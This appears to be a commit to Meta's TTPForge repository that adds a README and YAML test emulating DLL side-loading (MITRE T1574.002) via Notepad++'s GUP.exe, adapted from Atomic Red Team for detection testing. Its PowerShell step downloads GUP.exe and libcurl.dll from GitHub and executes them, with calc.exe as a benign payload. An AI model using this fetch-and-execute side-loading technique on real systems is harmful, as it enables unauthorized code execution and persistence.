Windows Atomic Tests to TTP facebookincubator#2

Summary: Converting atomics to ttps in Windows Atomic Red Team Tests This ttp was 2/10 and it performs the follow function: DLL Side-Loading using the Notepad++ GUP.exe binary Reviewed By: godlovepenn Differential Revision: D62388575
jazzyle · Sep 12, 2024 · 0719f5f · 0719f5f
1 parent e1c6129
commit 0719f5f
Show file tree

Hide file tree

Showing 2 changed files with 113 additions and 0 deletions.
diff --git a/ttps/persistence/windows/dll-side-loading/README.md b/ttps/persistence/windows/dll-side-loading/README.md
@@ -0,0 +1,51 @@
+# DLL Side-Loading using the Notepad++ GUP.exe binary
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)
+
+This TTP uses GUP, an open source signed binary used by Notepad++ for software updates that is vulnerable to DLL Side-Loading. This enables the libcurl dll to be loaded and upon execution, calc.exe will be opened.
+
+Derived from [Atomic Red Team T1574.002](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary)
+
+## Arguments
+- **process_name**:  a string flag specifying the name of created calc process. Default is "CalculatorApp".
+- **gup_exe**: a path flag specifying location of GUP.exe. Default is "bin\GUP.exe".
+- **curl_dll**: a path flag specifying location of libcurl.dll. Default is "bin\libcurl.dll".
+
+## Pre-requisites
+- Windows operating system equipped with powershell
+
+## Examples
+You can run the TTP using the following example (after updating the arguments):
+```bash
+ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml
+```
+```bash
+ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg process_name=calc
+```
+```bash
+ttpforge run forgearmory//persistence/windows/dll-side-loading/dll-side-loading.yaml --arg gup_exe=bin\myGUP.exe --arg curl_dll=bin\mylibcurl.dll
+```
+
+## Steps
+1. **execute_GUP** : This step downloads GUP.exe, if not provided, and executes binary
+2. **cleanup**: Stops the process for calculator app and delete files that were downloaded
+
+## Manual Reproduction
+```bash
+
+#Run bin\GUP.exe (ensure libcurl.dll exist)
+bin\GUP.exe
+
+#Stops calculator process
+stop-process -name CalculatorApp
+
+```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+    - TA0003 Persistence / TA0004 Privilege Escalation
+- **Techniques**:
+    - T1574 Hijack Execution Flow
+- **Subtechniques**:
+    - T1574.002 DLL Side-Loading
diff --git a/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml b/ttps/persistence/windows/dll-side-loading/dll-side-loading.yaml
@@ -0,0 +1,62 @@
+---
+api_version: 2.0
+uuid: a0dbea02-4978-4318-9af7-1aef1e2d2409
+name: DLL Side-Loading using the Notepad++ GUP.exe binary
+description: |
+  GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
+  Upon execution, calc.exe will be opened.
+  Derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
+requirements:
+  platforms:
+    - os: windows
+mitre:
+  tactics:
+    - TA0003 Persistence / TA0004 Privilege Escalation
+  techniques:
+    - T1574 Hijack Execution Flow
+  subtechniques:
+    - T1574.002 DLL Side-Loading
+
+args:
+  - name: process_name
+    description: Name of the created process
+    default: CalculatorApp
+  - name: gup_exe
+    description: GUP is an open source signed binary used by Notepad++ for software updates
+    type: path
+    default: bin\GUP.exe
+  - name: curl_dll
+    description: GUP requires libcurl.dll to function
+    type: path
+    default: bin\libcurl.dll
+
+steps:
+  - name: execute_GUP
+    executor: powershell
+    description: |
+        GUP.exe binary must exist on disk at specified location ({{.Args.gup_exe}}).
+        Downloads GUP.exe, if not provided, and executes binary.
+    inline: |
+      $parent = Split-Path "{{.Args.gup_exe}}" -Parent
+      if (-Not (Test-Path "{{.Args.gup_exe}}")) {
+        New-Item -Type Directory -Path ${parent} -ErrorAction Ignore | Out-Null
+        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "{{.Args.gup_exe}}"
+        New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+      }
+      if (-Not (Test-Path "{{.Args.curl_dll}}")) {
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/libcurl.dll?raw=true" -OutFile "${parent}\libcurl.dll"
+          New-Item -ItemType File -Path "${parent}\.downloaded" -ErrorAction ignore | Out-Null
+      } else {
+          Copy-Item -Path "{{.Args.curl_dll}}" -Destination "${parent}\libcurl.dll"
+      }
+
+      &"{{.Args.gup_exe}}"
+
+    cleanup:
+      executor: powershell
+      inline: |
+        stop-process -name {{.Args.process_name}}
+        $parent = Split-Path "{{.Args.gup_exe}}" -Parent
+        if (Test-Path "${parent}\.downloaded"){
+          remove-item -r $parent
+        }